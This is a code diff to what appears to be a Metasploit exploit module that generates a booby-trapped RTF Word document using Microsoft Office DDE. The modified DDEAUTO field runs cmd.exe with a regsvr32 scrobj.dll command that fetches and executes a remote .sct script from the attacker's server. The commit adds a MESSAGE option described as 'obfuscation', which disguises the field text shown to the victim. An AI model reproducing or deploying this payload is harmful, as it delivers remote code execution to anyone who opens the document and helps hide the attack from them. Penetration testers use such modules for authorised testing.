Add MESSAGE field for "obfuscation"

Author: Austin

modules/exploits/windows/fileformat/office_dde_delivery.rb

@@ -17,8 +17,8 @@ def initialize(info  = {})
       'Name' => 'Microsoft Office DDE Payload Delivery',
       'Description' => %q{
         This module generates an DDE command to place within
-        a word document, that when executed, will retrieve a HTA payload
-        via HTTP from an web server.
+        a word document, that when executed, will retrieve a payload
+        from the webserver
       },
       'Author' => 'mumbai',
       'License' => MSF_LICENSE,
@@ -40,6 +40,10 @@ def initialize(info  = {})
       OptString.new("FILENAME", [true, "Filename to save as, or inject", "msf.rtf"]),
       OptString.new("FOLDER_PATH", [false, "Path to file to inject", nil])
     ])
+
+    register_advanced_options([
+      OptString.new("MESSAGE", [true, "Message to output in remote data field", "MSF EXECUTABLE"])
+    ])
   end
 
   def gen_psh(url, *method)
@@ -134,7 +138,7 @@ def create_rtf
     #
     header = retrieve_header(datastore['FILENAME'])
     field_class = '{\field{\*\fldinst {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid3807165  '
-    field_class << "DDEAUTO C:\\\\\\\\Programs\\\\\\\\Microsoft\\\\\\\\Office\\\\\\\\MSword.exe\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe \"/c regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\" }}"
+    field_class << "DDEAUTO \"C:\\\\\\\\Programs\\\\\\\\Microsoft\\\\\\\\Office\\\\\\\\MSword.exe\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\" \"#{datastore['MESSAGE']}\" }}"
     field_class << '{\fldrslt }}\sectd \ltrsect\linex0\endnhere\sectlinegrid360\sectdefaultcl\sftnbj {\rtlch\fcs1 \af31507 \ltrch\fcs0' + "\n"
     field_class << '\insrsid5790315' + "\n"
     field_class << '\par }'